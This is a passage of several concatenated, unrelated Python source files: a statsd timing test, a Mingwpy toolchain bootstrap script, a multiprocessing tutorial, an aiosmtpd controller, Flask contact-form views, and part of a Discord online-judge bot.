with statsd.timed("foo"):
while mock_time.return_value < initial_time + 2:
pass
# Run the method within multiple threads
threads = []
for value in range(10):
t = threading.Thread(target=bar)
threads.append(t)
# Bump time so that previous thread can complete
mock_time.return_value += 1
t.start()
# Sleep to let the threads start
time.sleep(0.1)
# Bump time so that all threads completes
time.sleep(0.1)
mock_time.return_value += 1
time.sleep(0.1)
mock_time.return_value += 1
for t in threads:
t.join()
# All metrics were properly submitted
expected_values = [2 for _ in range(0, 10)]
self.assertMetrics(expected_values)
|
bootstrap.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# The code is placed into public domain by:
# anatoly techtonik <[email protected]>
#
# Bootstrap dependencies for compiling Mingwpy
# toolchain on Windows
#
# Securely fetch files using known hash/size
# combination, unpack them locally into .locally/
# subdir.
# --- bootstrap .locally --
#
# creates .locally/ subdirectory in the script's dir
# and sets a few global variables for convenience:
#
# ROOT - absolute path to source code checkout dir
# LOOT - absolute path to the .locally/ subdir
#
# provides some helpers:
#
# unzip(zippath, target, subdir=None)
# - extracts subdir from the zip file
# getsecure(targetdir, filespec, quiet=False)
# - download file and check hash/size
# ------------------------------ Data ---
"""
Every entry in specification for downloaded files below
contains following *required* fields:
filename - file is saved under this name in LOOT dir
(because file detection is not secure)
hashsize - to ensure that file is right
url -
check - LOOT path to check that file is unpacked
These fields are *optional*:
name - convenient name for dependency data
unpackto - LOOT path to unpack to
(in case archive doesn't have top dir)
Let's say this is filespec version 1.0
"""
filespec = [
# tools needed for bootstrap
dict(
filename='7za920.zip',
hashsize='9ce9ce89ebc070fea5d679936f21f9dde25faae0 384846',
url='http://downloads.sourceforge.net/sevenzip/7za920.zip',
check='7zip'
),
# tools needed to build gcc and friends
dict(
filename='msys2-base-i686-20160205.tar.xz',
hashsize='2aa85b8995c8ab6fb080e15c8ed8b1195d7fc0f1 45676948',
url='https://prdownloads.sourceforge.net/msys2/msys2-base-i686-20160205.tar.xz',
check='msys32',
),
]
# ------------------------------ Code ---
# --- create .locally/ subdir ---
import os
import sys
PY3K = sys.version_info >= (3, 0)
ROOT = os.path.abspath(os.path.dirname(__file__))
LOOT = os.path.join(ROOT, '.locally/')
if not os.path.exists(LOOT):
os.mkdir(LOOT)
# ---[ utilities ]---
# from locally ...
import os
from hashlib import sha1
from os.path import exists, getsize, join
if PY3K:
import urllib.request as urllib
else:
import urllib
def hashsize(path):
'''
Generate SHA-1 hash + file size string for the given
filename path. Used to check integrity of downloads.
Resulting string is space separated 'hash size':
>>> hashsize('locally.py')
'fbb498a1d3a3a47c8c1ad5425deb46b635fac2eb 2006'
'''
size = getsize(path)
h = sha1()
with open(path, 'rb') as source:
while True:
# read in 64k blocks, because some files are too big
# and free memory is not enough
c = source.read(64*1024)
if not c:
break
h.update(c)
return '%s %s' % (h.hexdigest(), size)
class HashSizeCheckFailed(Exception):
'''Throw when downloaded file fails hash and size check.'''
pass
def getsecure(targetdir, filespec, quiet=False):
'''
Using description in `filespec` list, download
files from specified URL (if they don't exist)
and check that their size and sha-1 hash matches.
Files are downloaded into `targetdir`. `filespec`
is a list of entries, each entry is a dictionary
with obligatory keys: filename, hashsize and url.
filespec = [ {
'filename': 'wget.py',
'hashsize': '4eb39538d9e9f360643a0a0b17579f6940196fe4 12262',
'url': 'https://bitbucket.org/techtonik/python-wget/raw/2.0/wget.py'
} ]
Raises HashSizeCheckFailed if hash/size check
fails. Set quiet to false to skip printing
progress messages.
'''
# [-] no rollback
def check(filepath, shize):
"""Checking hash/size for the given file"""
if hashsize(filepath) != shize:
raise HashSizeCheckFailed(
'Hash/Size mismatch for %s\n exp: %s\n act: %s'
% (filepath, shize, hashsize(filepath)))
for entry in filespec:
filepath = join(targetdir, entry['filename'])
if exists(filepath):
if 'hashsize' not in entry:
if not quiet:
print("skipping - %-32s - downloaded, no hashsize" % entry['filename'])
continue
check(filepath, entry['hashsize'])
if not quiet:
print("skipping - %-32s - downloaded, hashsize ok" % entry['filename'])
continue
# file does not exists
if not quiet:
print("Downloading %s into %s" % (entry['filename'], targetdir))
urllib.urlretrieve(entry['url'], filepath)
if 'hashsize' not in entry:
if not quiet:
print("Hash/size is not set, skip check..")
continue
if not quiet:
print('Checking hash/size for %s' % filepath)
try:
check(filepath, entry['hashsize'])
except HashSizeCheckFailed:
# [x] remove file only if it was just downloaded
os.remove(filepath)
raise
def unzip(zippath, target, subdir=None, verbose=0):
'''extract entries from `subdir` of `zipfile` into `target/` directory'''
import os
from os.path import join, exists, dirname
import shutil
import zipfile
zf = zipfile.ZipFile(zippath)
dirs = set() # cache to speed up dir creation
for entry in zf.namelist():
# [ ] normalize entry (remove .. and / for security)
if subdir:
if not entry.startswith(subdir + '/'):
continue
else:
outfilename = join(target, entry.replace(subdir + '/', ''))
else:
outfilename = join(target, entry)
if outfilename.endswith('/'):
# directory entry
if not exists(outfilename):
os.makedirs(outfilename)
else:
# file entry
# some .zip files don't have directory entries
outdir = dirname(outfilename)
if (outdir not in dirs) and not exists(outdir):
os.makedirs(outdir)
dirs.add(outdir)
if verbose:
print(outfilename)
outfile = open(outfilename, "wb")
infile = zf.open(entry)
shutil.copyfileobj(infile, outfile)
outfile.close()
infile.close()
zf.close()
# from shellrun 2.0
import subprocess
class Result(object):
def __init__(self, command=None, retcode=None, output=None):
self.command = command or ''
self.retcode = retcode
self.output = output
self.success = False
if retcode == 0:
self.success = True
def run(command):
"""
Run `command` through shell and wait for it to complete.
stdin/stdout/stderr are shared with Python, so the output
is immediately visible and not captured. Returns Result
with command, retcode and success attributes.
- return code
- no stdout capture
- no stderr capture
- no deadlocks or MemoryError
- stdout, stderr and stdin are shared with Python process
┌─────────┐ ┌────────┐ ┌─────────┐
│ Parent │>─(stdin)─┬─>│ Python ├─────┬──(stdout)──>│ Parent │
│(console)│ │ │ script ├─────│┬─(stderr)──>|(console)│
└─────────┘ │ └────────┘ ││ └─────────┘
│ ┌────────────┐ ││
└─>│ Subprocess ├─┘│
│ (shell) ├──┘
└────────────┘
"""
process = subprocess.Popen(command, shell=True)
process.communicate()
return Result(command=command, retcode=process.returncode)
def run_capture_limited(command, maxlines=20000):
"""
Run `command` through a system shell, return last `maxlines`
as `output` string in Result object.
res.output - output
res.succeeded - result of the operation True/False
res.return_code - specific return code
┌─────────┐ (stdin) ┌─────────────┐ ┌─────────┐
│ Parent │>──┬────>│ Python ├─(stdout)──>│ Parent │
│(console)│ │ │ script ├─(stderr)──>│(console)│
└─────────┘ │ └───────────^─┘ └─────────┘
│ ┌────────────┐ │
└─>│ Subprocess ├─┤ (buffer: stdout+stderr
│ (shell) ├─┘ limited to maxlines)
└────────────┘
[x] start reader thread
[x] reader: wait for lines
[x] wait for process to complete
[x] reader: wait for EOF
[ ] may not be a binary accurate read, because of \n split
and reassembly, needs testing
[ ] buffer size is line limited, test big streams without
newlines
[ ] need tests for missing output
[ ] process finished, pipe closed, did reader thread get
all the output? when pipe closes? is it possible to
miss the data?
[ ] access local buffer from outside
[ ] show current buffer contents if needed
[ ] show current line count if needed
"""
import collections
import threading
lines = collections.deque(maxlen=maxlines)
def reader_thread(stream, lock):
for line in stream:
if not PY3K:
lines.append(line)
else:
# the only safe way to decode *any* binary data to
# string http://stackoverflow.com/a/27527728/239247
lines.append(line.decode('cp437'))
outpipe = subprocess.PIPE
errpipe = subprocess.STDOUT
process = subprocess.Popen(command, shell=True, stdout=outpipe,
stderr=errpipe)
lock = threading.Lock()
thread = threading.Thread(target=reader_thread, args=(process.stdout, lock))
thread.start()
# With communicate() we get in thread:
# ValueError: I/O operation on closed file
# or in main thread
# IOError: close() called during concurrent operation on the same file object.
#out, _ = process.communicate()
process.wait()
thread.join()
return Result(command=command,
retcode=process.returncode,
output=''.join(lines))
# ---[ /utilities ]---
if __name__ == '__main__':
print('---[ download dependencies ]---')
getsecure(LOOT, filespec)
print('---[ unpack dependencies ]---')
def unzip_if_not_exists(archive, path):
if exists(LOOT + path):
print('(skip) %s is unpacked' % path)
else:
print('Unpacking %s from %s' % (path, archive))
unzip(LOOT + filename, LOOT + path)
# unpacking 7zip
filename = filespec.pop(0)['filename']
if '7z' not in filename:
sys.exit('Error: 7zip entry must be the first in filespec')
unzip_if_not_exists(filename, '7zip')
cmd7zip = os.path.normpath(LOOT + '7zip/7za.exe')
# unpacking everything else
for entry in filespec:
fname = entry['filename']
targetdir = LOOT
if 'unpackto' in entry:
targetdir += entry['unpackto']
unpacked = exists(LOOT + entry['check'])
if unpacked:
print('(skip) %s is unpacked' % fname)
else:
if 'unpackto' in entry:
print('unpacking %s to %s' % (fname, entry['unpackto']))
else:
print('unpacking %s' % fname)
if fname.endswith('.zip'):
unzip(LOOT + fname, targetdir)
else:
if fname.endswith('.tar.gz') or fname.endswith('.tar.xz') or fname.endswith('.txz'):
cmd = '"%s" x -so "%s" | "%s" x -y -si -ttar -o"%s"' % (cmd7zip, LOOT + fname, cmd7zip, targetdir)
else:
cmd = '"%s" x -y -bd -o"%s" "%s"' % (cmd7zip, targetdir, LOOT + fname)
r = run_capture_limited(cmd, maxlines=10)
if not r.success:
print('error: command failed')
print(' %s' % r.command)
print('output:')
for line in r.output.splitlines():
print(' '+line)
sys.exit(-1)
print('---[ running checks ]---')
if ' ' in os.getcwd():
# MSYS2 is sensitive to spaces in paths
sys.exit('check failed: current path contains spaces')
print('---[ configure MSYS2 ]---')
MSYS2 = LOOT + '/msys32/usr/bin'
def bash(command):
return run(MSYS2 + '/bash --login -c "{}"'.format(command))
# do first time setup
bash('exit')
# update pacman database
bash('pacman -Sy')
# install packages
res = bash('pacman -S --noconfirm git subversion tar zip p7zip make patch automake libtool bison gettext-devel wget sshpass texinfo')
# check that gcc is not installed
res = bash('gcc -v 2> /dev/null')
if res.retcode != 127:
sys.exit('check failed: gcc is installed')
print('')
print('---[ cloning custom mingw-build scripts ]---')
bash('git clone -b mingwpy-dev https://github.com/mingwpy/mingw-builds.git')
print('')
print('---[ running 32-bit build ]---')
bash("""cd mingw-builds; ./build --mode=gcc-5.3.0 --static-gcc --arch=i686 --march-x32='pentium4' \
--mtune-x32='generic' --buildroot=/tmp/i686 --rev=201603 --rt-version=trunk \
--threads=win32 --exceptions=sjlj --enable-languages=c,c++,fortran --fetch-only""")
|
DEMO_multi_processing.py
|
import time
import numpy as np
import multiprocessing as mp
"""An Tutorial of multi-processing (a Python built-in library)
"""
def func_pipe1(conn, p_id):
print(p_id)
time.sleep(0.1)
conn.send(f'{p_id}_send1')
print(p_id, 'send1')
time.sleep(0.1)
conn.send(f'{p_id}_send2')
print(p_id, 'send2')
time.sleep(0.1)
rec = conn.recv()
print(p_id, 'recv', rec)
time.sleep(0.1)
rec = conn.recv()
print(p_id, 'recv', rec)
def func_pipe2(conn, p_id):
print(p_id)
time.sleep(0.1)
conn.send(p_id)
print(p_id, 'send')
time.sleep(0.1)
rec = conn.recv()
print(p_id, 'recv', rec)
def func1(i):
time.sleep(1)
print(f'args {i}')
def func2(args): # multiple parameters (arguments)
# x, y = args
x = args[0] # write in this way, easier to locate errors
y = args[1] # write in this way, easier to locate errors
time.sleep(1) # pretend it is a time-consuming operation
return x - y
def run__pool(): # main process
from multiprocessing import Pool
cpu_worker_num = 3
process_args = [(1, 1), (9, 9), (4, 4), (3, 3), ]
print(f'| inputs: {process_args}')
start_time = time.time()
with Pool(cpu_worker_num) as p:
outputs = p.map(func2, process_args)
print(f'| outputs: {outputs} TimeUsed: {time.time() - start_time:.1f} \n')
'''Another way (I don't recommend)
Using 'functions.partial'. See https://stackoverflow.com/a/25553970/9293137
from functools import partial
# from functools import partial
# pool.map(partial(f, a, b), iterable)
'''
def run__process(): # mp: multiprocessing
from multiprocessing import Process
process = [Process(target=func1, args=(1,)),
Process(target=func1, args=(2,)), ]
[p.start() for p in process]
[p.join() for p in process]
def run__pipe():
from multiprocessing import Process, Pipe
conn1, conn2 = Pipe()
process = [Process(target=func_pipe1, args=(conn1, 'I1')),
Process(target=func_pipe2, args=(conn2, 'I2')),
Process(target=func_pipe2, args=(conn2, 'I3')), ]
[p.start() for p in process]
print('| Main', 'send')
conn1.send(None)
print('| Main', conn2.recv())
[p.join() for p in process]
def run__queue():
from multiprocessing import Process, Queue
queue = Queue(maxsize=4) # the following attribute can call in parent(main) or child process, just like 'Pipe'
queue.put(True)
queue.put([0, None, object]) # you can put deepcopy thing
queue.qsize() # the length of queue
print(queue.get()) # First In First Out
print(queue.get()) # First In First Out
queue.qsize() # the length of queue
process = [Process(target=func1, args=(queue,)),
Process(target=func1, args=(queue,)), ]
[p.start() for p in process]
[p.join() for p in process]
if __name__ == '__main__': # it is necessary to write main process in "if __name__ == '__main__'"
# run__process()
# run__pool()
run__pipe()
|
controller.py
|
import os
import asyncio
import threading
from aiosmtpd.smtp import SMTP
from public import public
from typing import Any, Dict
@public
class Controller:
def __init__(self, handler, loop=None, hostname=None, port=8025, *,
ready_timeout=1.0, enable_SMTPUTF8=True, ssl_context=None,
server_kwargs: Dict[str, Any] = None):
"""
`Documentation can be found here
<http://aiosmtpd.readthedocs.io/en/latest/aiosmtpd\
/docs/controller.html#controller-api>`_.
"""
self.handler = handler
self.hostname = '::1' if hostname is None else hostname
self.port = port
self.enable_SMTPUTF8 = enable_SMTPUTF8
self.ssl_context = ssl_context
self.loop = asyncio.new_event_loop() if loop is None else loop
self.server = None
self._thread = None
self._thread_exception = None
self.ready_timeout = os.getenv(
'AIOSMTPD_CONTROLLER_TIMEOUT', ready_timeout)
self.server_kwargs: Dict[str, Any] = server_kwargs or {}
def factory(self):
"""Allow subclasses to customize the handler/server creation."""
return SMTP(self.handler, enable_SMTPUTF8=self.enable_SMTPUTF8,
**self.server_kwargs)
def _run(self, ready_event):
asyncio.set_event_loop(self.loop)
try:
self.server = self.loop.run_until_complete(
self.loop.create_server(
self.factory, host=self.hostname, port=self.port,
ssl=self.ssl_context))
except Exception as error: # pragma: nowsl
# Somehow WSL1.0 (Windows Subsystem for Linux) allows multiple
# listeners on one port?!
# That is why we add "pragma: nowsl" there, so when testing on
# WSL we can specify "PLATFORM=wsl".
self._thread_exception = error
return
self.loop.call_soon(ready_event.set)
self.loop.run_forever()
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.loop.close()
self.server = None
def start(self):
assert self._thread is None, 'SMTP daemon already running'
ready_event = threading.Event()
self._thread = threading.Thread(target=self._run, args=(ready_event,))
self._thread.daemon = True
self._thread.start()
# Wait a while until the server is responding.
ready_event.wait(self.ready_timeout)
if self._thread_exception is not None: # pragma: nowsl
# See comment about WSL1.0 in the _run() method
raise self._thread_exception
def _stop(self):
self.loop.stop()
try:
_all_tasks = asyncio.Task.all_tasks
except AttributeError: # pragma: skipif_lt_py39
_all_tasks = asyncio.all_tasks
for task in _all_tasks(self.loop):
task.cancel()
def stop(self):
assert self._thread is not None, 'SMTP daemon not running'
self.loop.call_soon_threadsafe(self._stop)
self._thread.join()
self._thread = None
|
views.py
|
from app import app
import logging
logging.basicConfig(level=logging.DEBUG)
from flask import Flask, render_template, request, redirect, url_for, flash, jsonify
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField
from wtforms.validators import DataRequired, Email
from flask_mail import Mail, Message
from threading import Thread
import os
app.config['SECRET_KEY'] = os.environ.get('SECRET_KEY')
app.config['CONTACT_SUBJECT_PREFIX'] = '[PORTFOLIO SITE CONTACT FORM]'
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['MAIL_SENDER'] = os.environ.get('MAIL_SENDER')
app.config['ADMIN_EMAIL'] = os.environ.get('ADMIN_EMAIL')
app.config['NAME'] = os.environ.get('NAME')
mail=Mail(app)
def create_email_from_form(subject, template, **formdata):
message= Message(subject=subject,
recipients=[app.config['ADMIN_EMAIL']],
sender=app.config['MAIL_SENDER'])
message.body = render_template(template + '.txt', **formdata)
message.html = render_template(template + '.html', **formdata)
return message
def send_email(message):
thread = Thread(target=send_async_email, args=[app, message])
thread.start()
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
class ContactForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
email = StringField('What is your email?', validators=[DataRequired(), Email()])
message = TextAreaField('What is your message?', validators=[DataRequired()])
submit = SubmitField('Send')
@app.route("/")
def home():
return render_template("index.html", title="Home", name=app.config['NAME'])
@app.route("/posts")
def posts():
return render_template("posts.html", title="Posts", name=app.config['NAME'])
@app.route("/about")
def about():
return render_template("about.html", title="About", name=app.config['NAME'])
@app.route("/projects")
def projects():
return render_template("projects.html", title="Projects", name=app.config['NAME'])
@app.route("/contact", methods=['GET', 'POST'])
def contact():
logging.info('Contact page')
form = ContactForm()
if form.validate_on_submit():
logging.info('Form validated')
if app.config['ADMIN_EMAIL']:
logging.info('trying to send email to ' + app.config['ADMIN_EMAIL'])
email = create_email_from_form(app.config['CONTACT_SUBJECT_PREFIX'], 'contactemail', name=form.name.data, email=form.email.data, message=form.message.data)
logging.info('email created')
start_email_thread(email)
logging.info('email sent')
return redirect(url_for('contact'))
else:
logging.info("form did not validate on submit")
return render_template("contact.html", title="Contact", form=form, name=app.config['NAME'])
|
main.py
|
# Online Judge Discord Bot
# Main python executable
import time
import discord
import os
import sys
import subprocess
import math
import dns
import asyncio
import judging
import contests
import requests
import secrets
import string
import grpc
import judge_pb2
import judge_pb2_grpc
import uuid
import hashlib
import ProblemUpload
from multiprocessing import Process
from multiprocessing import Manager
from google.cloud import storage
from functools import cmp_to_key
from pymongo import MongoClient
client = discord.Client()
def writeCode(source, filename):
f = open(filename, "w")
f.write(source)
f.close()
def clearFile(filename):
os.remove(filename)
def clearSources(judgeNum):
try:
clearFile("Judge" + str(judgeNum) + "/data.out")
except:
print("Failed to remove output file")
def decode(cde):
if cde == 0:
return "Available"
elif cde == 1:
return "Submission in Progress"
elif cde == 2:
return "Offline"
else:
return ""
def generatePassword():
alphabet = string.ascii_letters + string.digits
password = ''.join(secrets.choice(alphabet) for i in range(13))
return password
def clean(src):
return src.replace("`", "")
def getLen(contest):
return settings.find_one({"type":"contest", "name":contest})['len']
def perms(found, author):
acc = settings.find_one({"type":"access", "mode":found['contest'], "name":author})
if (not settings.find_one({"type":"access", "mode":"owner", "name":author}) is None):
return False # Has owner perms
if (not settings.find_one({"type":"access", "mode":"admin", "name":author}) is None) and (author in found['authors']):
return False # Has admin perms
elif (not acc is None) and (found['status'] == "s") and contests.compare(acc['start'], contests.current_time()) <= getLen(found['contest']):
return False # Has contest participant perms
return (not found['published']) or (found['status'] != "s")
def getStatus():
msg = ""
for x in settings.find({"type":"judge"}):
msg += "Judge #" + str(x['num']) + ": " + decode(x['status']).ljust(23)
if x['status'] != 2:
msg += "(" + x['runtimes'] + ")"
msg += "\n"
return msg
async def updateStatus():
msg = getStatus()
global status
try:
await status.edit(content = ("**Current live judge server statuses:**\n```" + getStatus() + "\n```"))
except:
print("Failed to update live status")
return
def amt(len):
h = len // 3600
len %= 3600
m = len // 60
len %= 60
s = len
return "{hh} hours, {mm} minutes, and {ss} seconds".format(hh = h, mm = m, ss = s)
def profile(name):
prof = settings.find_one({"type":"profile", "name":name})
if prof is None:
return (name + " has not solved any problems yet.")
a = "Problems fully solved by `" + name + "`:\n```"
cnt = 0
for x in prof['solved']:
p = settings.find_one({"type":"problem", "name":x})
if p is None or not p['published']:
continue
a += x + " (" + str(p['points']) + " points)\n"
cnt += 1
if cnt <= 0:
return (name + " has not solved any problems yet.")
return a + "```" + str(cnt) + " problems solved in total"
def addToProfile(name, problem):
if settings.find_one({"type":"profile", "name":name}) is None:
settings.insert_one({"type":"profile", "name":name, "solved":[]})
settings.update_one({"type":"profile", "name":name}, {"$addToSet":{"solved":problem}})
def cmp(a, b):
if a[1] != b[1]:
return b[1] - a[1]
return a[2] - b[2]
def cmpProblem(a, b):
return a[0] - b[0]
def getScoreboard(contest):
ct = settings.find_one({"type":"contest", "name":contest})
if ct is None:
return "Contest not found!"
time_bonus = ct['has-time-bonus']
penalty = ct['has-penalty']
fnd = settings.find({"type":"access", "mode":contest})
arr = [x for x in fnd]
msg = "**Current rankings for participants in contest `" + contest + "`**\n```"
cnt = 0
namWid = 0
pWid = [0] * (ct['problems'] + 1)
comp = []
for x in arr:
namWid = max(namWid, len(x['name']))
for y in range(1, len(x['solved'])):
dt = "P" + str(y) + "-" + str(x['solved'][y])
if time_bonus and x['time-bonus'][y] > 0:
dt += "(+" + str(x['time-bonus'][y]) + ")"
if penalty and x['penalty'][y] > 0:
dt += "(" + str(x['penalty'][y]) + ")"
pWid[y] = max(pWid[y], len(dt))
for x in arr:
m = x['name'].ljust(namWid) + " : "
total = 0
for y in range(1, len(x['solved'])):
dt = "P" + str(y) + "-" + str(x['solved'][y])
if time_bonus and x['time-bonus'][y] > 0:
dt += "(+" + str(x['time-bonus'][y]) + ")"
if penalty and x['penalty'][y] > 0:
dt += "(" + str(x['penalty'][y]) + ")"
m += dt.ljust(pWid[y]) + " "
total += x['solved'][y] + x['time-bonus'][y]
m += "total: " + str(total)
comp.append((m, total, sum(x['penalty'])))
comp.sort(key = cmp_to_key(cmp))
idx = 0
cur = 0
for i in range(len(comp)):
cur += 1
if i == 0 or comp[i - 1][1] != comp[i][1] or comp[i - 1][2] != comp[i][2]:
idx = cur
msg += str(idx) + ") " + comp[i][0] + "\n"
if len(comp) <= 0:
msg += "---No participants are in this contest yet---\n"
return msg + "```"
async def live_scoreboard(contest):
global scb
current_contest = settings.find_one({"type":"livecontests"})['arr']
for x in range(len(current_contest)):
if current_contest[x] == contest:
await scb[x].edit(content = getScoreboard(contest))
return
print("Failed to update live scoreboard")
def get_bonus(rem, pts):
return (pts * rem) // 30000
async def updateScore(contest, problem, user, score, ct):
post = settings.find_one({"type":"access", "name":user, "mode":contest})
if post is None:
print("Failed to update score (no access post)")
return
elapsed = contests.compare(post['start'], ct)
contest_len = getLen(contest)
if elapsed > contest_len:
print("Invalid score update")
return
arr = post['solved']
penalty = post['penalty']
time_bonus = post['time-bonus']
num = int(problem[len(problem) - 1])
if score <= arr[num] and arr[num] < 100:
penalty[num] += 1
if arr[num] < 100:
settings.update_one({"_id":post['_id']}, {"$set":{"taken":elapsed}})
arr[num] = max(arr[num], score)
time_bonus[num] = max(time_bonus[num], get_bonus(contest_len - elapsed, score))
settings.update_one({"_id":post['_id']}, {"$set":{"solved":arr, "penalty":penalty, "time-bonus":time_bonus}})
await live_scoreboard(contest)
def remaining(name):
acc = settings.find({"type":"access", "name":name})
msg = ""
for x in acc:
if x['mode'] != "admin" and x['mode'] != "owner":
try:
total = getLen(x['mode'])
elapsed = contests.compare(x['start'], contests.current_time())
rem = total - elapsed
if rem <= 0:
msg += "Time's up! `" + name + "`'s participation in contest `" + x['mode'] + "` has ended.\n"
else:
msg += "`" + name + "` still has `" + amt(rem) + "` left on contest `" + x['mode'] + "`\n"
except:
pass
if len(msg) == 0:
return "`" + name + "` has not joined any contests"
return msg
async def sendLiveScoreboards():
current_contest = settings.find_one({"type":"livecontests"})['arr']
global scb
scb = [None] * len(current_contest)
sbc = client.get_channel(852311780378148914)
await sbc.purge(limit = 100)
for x in range(len(current_contest)):
scb[x] = await sbc.send(getScoreboard(current_contest[x]))
def runSubmission(judges, username, cleaned, lang, problm, attachments, return_dict):
with grpc.insecure_channel(judges['ip'] + ":" + str(judges['port'])) as channel:
stub = judge_pb2_grpc.JudgeServiceStub(channel)
response = stub.judge(judge_pb2.SubmissionRequest(username = username, source = cleaned, lang = lang, problem = problm['name'], attachment = attachments))
finalscore = response.finalScore
return_dict['finalscore'] = finalscore
def hashCode(password):
salt = uuid.uuid4().hex
return hashlib.sha256(salt.encode() + password.encode()).hexdigest() + ':' + salt
def check_equal(hashed_password, user_password):
password, salt = hashed_password.split(':')
return password == hashlib.sha256(salt.encode() + user_password.encode()).hexdigest()
@client.event
async def on_ready():
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name="-help"))
global storage_client
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'google-service-key.json'
stc = storage.Client()
storage_client = stc.get_bucket('discord-bot-oj-file-storage')
pswd = os.getenv("PASSWORD")
cluster = MongoClient(pswd)
db = cluster['database']
global settings
settings = db['settings']
global running
running = True
global status
stat = client.get_channel(851468547414294568)
await stat.purge(limit = 100)
status = await stat.send("**Current live judge server statuses:**\n```" + getStatus() + "\n```")
await sendLiveScoreboards()
print(f'{client.user} has connected to Discord!')
async def handleSubmission(message):
first = True
while True:
req = None
channel = None
author = None
if first:
req = settings.find_one({"type":"req", "user":str(message.author), "used":False})
channel = message.channel
author = str(message.author)
else:
req = settings.find_one({"type":"queued"})
channel = client.get_channel(req['channel'])
author = req['user']
if not str(message.content).startswith("-") and (not req is None):
try:
ct = contests.current_time()
username = req['user']
problem = req['problem']
lang = req['lang']
settings.delete_one({"type":"prev", "name":username})
settings.insert_one({"type":"prev", "name":username, "problem":problem, "lang":lang})
problm = settings.find_one({"type":"problem", "name":problem})
await updateStatus()
cleaned = ""
attachments = False
if not first:
cleaned = req['cleaned']
attachments = req['attachments']
else:
if message.attachments:
cleaned = message.attachments[0].url
attachments = True
else:
# Clean up code from all backticks
cleaned = clean(str(message.content))
judges = None
if first and "judge" in req:
judges = settings.find_one({"type":"judge", "num":req['judge']})
if first and "judge" in req and not judges is None and judges['status'] == 0:
judges = settings.find_one({"type":"judge", "num":req['judge']})
else:
judges = settings.find_one({"type":"judge", "status":0})
if judges is None:
settings.update_one({"_id":req['_id']}, {"$set":{"type":"queued", "channel":message.channel.id, "cleaned":cleaned, "attachments":attachments}})
await message.channel.send("Submission queued: Waiting for a suitable judge to process your submission. Please wait a few seconds.")
return True
avail = judges['num']
settings.update_one({"_id":req['_id']}, {"$set":{"used":True}})
settings.update_one({"_id":judges['_id']}, {"$set":{"status":1}})
settings.delete_one({"_id":req['_id']})
await updateStatus()
settings.insert_one({"type":"use", "author":str(author), "message":cleaned})
await channel.send("Now judging your program. See execution results below.")
manager = Manager()
return_dict = manager.dict()
rpc = Process(target = runSubmission, args = (judges, username, cleaned, lang, problm, attachments, return_dict,))
rpc.start()
msgContent = "```Waiting for response from Judge " + str(avail) + "```"
curmsg = await channel.send(msgContent)
while rpc.is_alive():
newcontent = settings.find_one({"type":"judge", "num":avail})['output']
if newcontent != msgContent and len(newcontent) > 0:
msgContent = newcontent
try:
await curmsg.edit(content = msgContent)
except:
print("Edited empty message")
await asyncio.sleep(0.5)
try:
finalscore = return_dict['finalscore']
await curmsg.edit(content = settings.find_one({"type":"judge", "num":avail})['output'])
if finalscore == 100:
addToProfile(author, problem)
if len(problm['contest']) > 0 and finalscore >= 0:
await updateScore(problm['contest'], problem, author, finalscore, ct)
except Exception as e:
await channel.send("Judging error: Fatal error occured on Judge Server " + str(avail) + " while grading solution")
print(e)
settings.update_one({"_id":judges['_id']}, {"$set":{"output":""}})
except Exception as e:
await channel.send("Judging error: Fatal error occured while grading solution\n```" + str(e) + "\n```")
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
settings.update_one({"_id":judges['_id']}, {"$set":{"status":0}})
await updateStatus()
first = False
else:
break
return not first
@client.event
async def on_message(message):
if message.author == client.user:
return
global settings
global running
global status
global storage_client
if str(message.content).startswith("-"):
for x in settings.find({"type":"command"}):
if str(message.content).startswith(x['name']):
settings.insert_one({"type":"use", "author":str(message.author), "message":str(message.content)})
break
if not await handleSubmission(message):
if len(str(message.content)) <= 0:
return
if message.content == "-help":
await message.channel.send("**Here are some of my commands:**")
f = open("commands.txt", "r")
await message.channel.send("```" + str(f.read()) + "```")
elif message.content.startswith("-problem"):
w1 = 14
out = "Problem Name".ljust(w1) + "Difficulty\n"
out += "-----------------------------------------------\n"
arr = sorted([(x['points'], x['name']) for x in settings.find({"type":"problem", "published":True})], key = cmp_to_key(cmpProblem))
for x in arr:
out += x[1].ljust(w1) + (str(x[0]) + " points") + "\n"
out += "\n"
f = open("problems.txt", "r")
out += f.read()
f.close()
await message.channel.send("All published problems:\n```\n" + out + "```")
elif str(message.content).split()[0].startswith("-sub"):
arr = str(message.content).split()
if len(arr) < 3:
await message.channel.send("Incorrect formatting for submit command. Please type `-submit [problemName] [language]` and wait for the judge to prompt you for your source code.")
return
problem = arr[1].lower()
language = arr[2].lower()
found = settings.find_one({"type":"problem", "name":problem})
if found is None or (perms(found, str(message.author))):
await message.channel.send("Judging Error: Problem not found. The problem may either be private or does not exist.")
return
lang = settings.find_one({"type":"lang", "name":language})
if lang is None:
await message.channel.send("Judging Error: Language not Found. Type `-langs` for a list of supported languages.")
return
judge = 0
if not settings.find_one({"type":"access", "mode":"admin", "name":str(message.author)}) is None and len(arr) > 3:
try:
judge = int(arr[3])
except:
pass
settings.insert_one({"type":"req", "user":str(message.author), "problem":problem, "lang":language, "used":False, "judge":judge})
await message.channel.send("Submission request received from `" + str(message.author) + "` for problem `" + problem + "` in `" + language + "`.\nSend your source code either as an attachment or a message surrounded by backticks (`).")
elif str(message.content).startswith("-rs"):
arr = str(message.content).split()
prev = settings.find_one({"type":"prev", "name":str(message.author)})
if prev is None:
await message.channel.send("No previous submission found. Please type `-submit [problemName] [language]` to submit a submission.")
return
if perms(settings.find_one({"type":"problem", "name":prev['problem']}), str(message.author)):
await message.channel.send("Judging Error: Problem not found. The problem may either be private or does not exist.")
return
language = None
if len(arr) < 2:
settings.insert_one({"type":"req", "user":str(message.author), "problem":prev['problem'], "lang":prev['lang'], "used":False})
language = prev['lang']
else:
